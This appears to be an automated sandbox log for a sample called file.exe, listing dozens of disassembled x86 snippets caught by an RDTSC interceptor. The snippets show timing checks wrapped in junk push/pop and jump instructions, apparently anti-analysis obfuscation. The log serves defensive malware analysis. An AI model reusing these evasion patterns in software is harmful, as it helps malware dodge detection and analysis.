Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E68691 second address: E686C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F60F1137216h 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F60F1137224h 0x00000013 pushad 0x00000014 jmp 00007F60F113721Dh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E68E84 second address: E68E99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F12493B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E68E99 second address: E68EA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F60F1137216h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9F38E second address: E9F394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9F394 second address: E9F398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9F4D0 second address: E9F528 instructions: 0x00000000 rdtsc 0x00000002 js 00007F60F12493A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F60F12493ACh 0x00000010 pushad 0x00000011 jmp 00007F60F12493B8h 0x00000016 push edx 0x00000017 pop edx 0x00000018 push esi 0x00000019 pop esi 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jnl 00007F60F12493C1h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9F91E second address: E9F924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E1B5A9 second address: E1B5B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F60F12493A6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA557A second address: EA5582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA5582 second address: EA5587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA5587 second address: EA55D6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F60F113722Eh 0x00000008 jmp 00007F60F1137226h 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F60F113721Ch 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jbe 00007F60F1137263h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F60F113721Bh 0x00000023 jmp 00007F60F113721Eh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA5AB6 second address: EA5AD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 jns 00007F60F12493A6h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F60F12493AEh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA5AD6 second address: EA5ADC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA5ADC second address: EA5AE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA5AE2 second address: EA5AE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA5AE6 second address: EA5AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA5C4B second address: EA5C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F113721Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA5C5A second address: EA5C62 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA63E5 second address: EA63EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA63EB second address: EA63F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA6667 second address: EA6685 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F60F1137227h 0x00000008 pop esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA8E9D second address: EA8EC3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F60F12493A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jnc 00007F60F12493A6h 0x00000013 jmp 00007F60F12493B2h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA8FEE second address: EA9016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 jno 00007F60F1137218h 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 jmp 00007F60F113721Ch 0x00000015 push eax 0x00000016 pop eax 0x00000017 ja 00007F60F1137216h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EAC372 second address: EAC376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EAC376 second address: EAC37C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EABC35 second address: EABC58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F60F12493B2h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F60F12493A6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EABC58 second address: EABC5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EABC5C second address: EABC6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F12493ADh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EABF25 second address: EABF3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F60F1137223h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB03BD second address: EB03E5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F60F12493A6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F60F12493ACh 0x00000012 jl 00007F60F12493A6h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push ebx 0x0000001c pushad 0x0000001d popad 0x0000001e jo 00007F60F12493A6h 0x00000024 pop ebx 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB03E5 second address: EB03EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB03EE second address: EB03F3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB03F3 second address: EB041A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F60F1137216h 0x0000000f jmp 00007F60F1137228h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB041A second address: EB041E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB06AC second address: EB06B9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB0C43 second address: EB0C57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F12493AFh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB4DFE second address: EB4E02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB4E02 second address: EB4E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F12493B4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E1143A second address: E11440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB45F2 second address: EB4603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F60F12493A6h 0x0000000a jne 00007F60F12493A6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB4603 second address: EB4608 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB4608 second address: EB461A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jp 00007F60F12493A6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB461A second address: EB4638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007F60F1137227h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB4638 second address: EB463E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB4760 second address: EB4786 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F60F1137216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F60F113722Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB4786 second address: EB478C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB478C second address: EB47A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F1137222h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB4AA2 second address: EB4AAC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F60F12493A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB939C second address: EB93AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F60F113721Eh 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB969E second address: EB96C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60F12493B0h 0x00000009 jmp 00007F60F12493B5h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB96C7 second address: EB96FA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F60F1137216h 0x00000008 js 00007F60F1137216h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jg 00007F60F1137223h 0x0000001a jmp 00007F60F113721Dh 0x0000001f jmp 00007F60F113721Ch 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB9854 second address: EB9860 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jne 00007F60F12493A6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB9860 second address: EB9864 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB9864 second address: EB9874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F60F12493ACh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB99BF second address: EB99CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB99CA second address: EB99CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB9AE3 second address: EB9B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F60F1137216h 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f pop ebx 0x00000010 pushad 0x00000011 push edi 0x00000012 je 00007F60F1137216h 0x00000018 pop edi 0x00000019 push ebx 0x0000001a pushad 0x0000001b popad 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e pop ebx 0x0000001f js 00007F60F113721Ch 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E688D6 second address: E688DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E688DA second address: E6891F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F60F1137229h 0x0000000b popad 0x0000000c nop 0x0000000d add dword ptr [ebp+12465119h], esi 0x00000013 mov ebx, dword ptr [ebp+124897B8h] 0x00000019 movsx edx, bx 0x0000001c mov dword ptr [ebp+122D38A8h], ecx 0x00000022 add eax, ebx 0x00000024 mov dx, di 0x00000027 nop 0x00000028 jc 00007F60F1137224h 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6891F second address: E68925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E68925 second address: E68969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F60F113721Bh 0x0000000b nop 0x0000000c and edi, dword ptr [ebp+12450EDFh] 0x00000012 push 00000004h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F60F1137218h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000015h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov edi, dword ptr [ebp+122D2B14h] 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E68969 second address: E6896D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6896D second address: E68973 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E68973 second address: E68979 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB9C50 second address: EB9C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jc 00007F60F113721Ch 0x0000000d jbe 00007F60F1137216h 0x00000013 jo 00007F60F113721Ah 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push ebx 0x00000021 jmp 00007F60F1137224h 0x00000026 pop ebx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC0930 second address: EC093C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F60F12493A6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC093C second address: EC096D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F60F113723Fh 0x0000000e jmp 00007F60F113721Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F60F1137222h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC0BEC second address: EC0BF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC0E76 second address: EC0E82 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC19C6 second address: EC19CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC19CC second address: EC19D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC19D0 second address: EC19DA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F60F12493A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC19DA second address: EC19EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F60F1137216h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC6306 second address: EC6310 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F60F12493B2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC6310 second address: EC6316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC6457 second address: EC645C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC6775 second address: EC6781 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jng 00007F60F1137216h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC6781 second address: EC6787 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC6787 second address: EC67A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F1137229h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC67A4 second address: EC67CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F12493B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F60F12493AEh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC6935 second address: EC6939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC6939 second address: EC693F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC6A68 second address: EC6A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC6DAE second address: EC6DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F60F12493A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC6DBA second address: EC6DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED5259 second address: ED525F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED525F second address: ED5265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED3248 second address: ED3254 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F60F12493A6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED3254 second address: ED3265 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 jg 00007F60F1137216h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED3732 second address: ED3736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED3736 second address: ED373C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED373C second address: ED374A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F60F12493ACh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED374A second address: ED3758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jc 00007F60F1137216h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED38C0 second address: ED38C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED38C5 second address: ED38E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F1137224h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F60F1137216h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED38E6 second address: ED38FA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F60F12493A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F60F12493A6h 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED3CE0 second address: ED3CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED3E88 second address: ED3E9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60F12493B1h 0x00000009 rdtsc
